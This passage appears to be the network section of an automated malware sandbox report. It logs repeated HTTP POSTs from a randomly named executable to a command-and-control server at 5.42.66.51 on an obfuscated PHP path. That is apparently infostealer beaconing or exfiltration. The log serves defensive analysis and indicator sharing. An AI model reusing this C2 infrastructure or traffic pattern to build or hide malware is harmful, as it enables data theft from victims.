                                                                                                53 | 192.168.2.5 | 50038 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:38.815675020 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:39.504086018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:39.633981943 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                54 | 192.168.2.5 | 50039 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:40.337326050 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:41.019238949 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:41.147634983 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                55 | 192.168.2.5 | 50040 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:42.079010963 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:42.761137009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:42.891403913 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                56 | 192.168.2.5 | 50041 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:42.162494898 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:42.847465992 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                57 | 192.168.2.5 | 50042 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:44.486063957 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:45.172259092 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:45.302998066 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:45 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                58 | 192.168.2.5 | 50043 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:46.323996067 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                59 | 192.168.2.5 | 50044 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:47.190479994 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:47.545495987 CEST | 2552 | OUT |
                                                                                                Oct 11, 2024 20:38:48.053354979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:48.191018105 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                60 | 192.168.2.5 | 50045 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:48.470120907 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:48.889848948 CEST | 2156 | OUT |
                                                                                                Oct 11, 2024 20:38:49.095366955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:49.227150917 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:49 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                61 | 192.168.2.5 | 50046 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:50.331645966 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:50.685612917 CEST | 2156 | OUT |
                                                                                                Oct 11, 2024 20:38:51.032080889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:51.161204100 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                62 | 192.168.2.5 | 50047 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:52.227608919 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:52.576322079 CEST | 2156 | OUT |


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                63 | 192.168.2.5 | 50048 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:52.790832043 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:53.138720036 CEST | 2552 | OUT |
                                                                                                Oct 11, 2024 20:38:53.487677097 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:53.999788046 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:38:53.999907970 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:38:54.000293970 CEST | 225 | IN | HTTP/1.1 100 Continue
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 18:38:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                64 | 192.168.2.5 | 50049 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:54.020570993 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:54.417082071 CEST | 2156 | OUT |


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                65 | 192.168.2.5 | 50050 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:56.627305031 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:56.990961075 CEST | 2552 | OUT |
                                                                                                Oct 11, 2024 20:38:57.343290091 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:57.471149921 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                66 | 192.168.2.5 | 50051 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:57.838104010 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:58.185700893 CEST | 2156 | OUT |
                                                                                                Oct 11, 2024 20:38:58.541266918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:58.672930956 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                67 | 192.168.2.5 | 50052 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:58.917371035 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:59.263747931 CEST | 2552 | OUT |
                                                                                                Oct 11, 2024 20:38:59.620443106 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:59.747216940 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 50053 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:00.012772083 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2128
Expect: 100-continue
Connection: Keep-Alive
Oct 11, 2024 20:39:00.357491970 CEST | 2128 | OUT | (request body)
Oct 11, 2024 20:39:00.694513083 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:00.823239088 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 50054 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:00.102210045 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2548
Expect: 100-continue
Connection: Keep-Alive
Oct 11, 2024 20:39:00.451417923 CEST | 2548 | OUT | (request body)
Oct 11, 2024 20:39:00.779896021 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:00.907224894 CEST | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 50055 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:01.036581993 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2552
Expect: 100-continue
Oct 11, 2024 20:39:01.388938904 CEST | 2552 | OUT | (request body)
Oct 11, 2024 20:39:01.730787039 CEST | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 50056 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:01.801029921 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Connection: Keep-Alive
Oct 11, 2024 20:39:02.176610947 CEST | 2156 | OUT | (request body)
Oct 11, 2024 20:39:02.591818094 CEST | 1236 | OUT | (request body)
Oct 11, 2024 20:39:02.734816074 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:02.734844923 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:02.737710953 CEST | 920 | OUT | (request body)
Oct 11, 2024 20:39:03.070744991 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.5 | 50057 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:04.106539011 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Oct 11, 2024 20:39:04.451307058 CEST | 2156 | OUT | (request body)
Oct 11, 2024 20:39:04.780942917 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:04.914619923 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.2.5 | 50058 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:04.709857941 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2548
Expect: 100-continue
Oct 11, 2024 20:39:05.060659885 CEST | 2548 | OUT | (request body)
Oct 11, 2024 20:39:05.586491108 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:05.586978912 CEST | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@T0
Oct 11, 2024 20:39:05.587106943 CEST | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.5 | 50059 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:05.832288980 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Oct 11, 2024 20:39:06.185779095 CEST | 2156 | OUT | (request body)


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.5 | 50060 | 5.42.66.51 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:39:06.520303965 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2552
Expect: 100-continue
Connection: Keep-Alive
Oct 11, 2024 20:39:06.873120070 CEST | 2552 | OUT | (request body)
Oct 11, 2024 20:39:07.216325045 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:39:07.347053051 CEST | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:39:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                76192.168.2.5500615.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
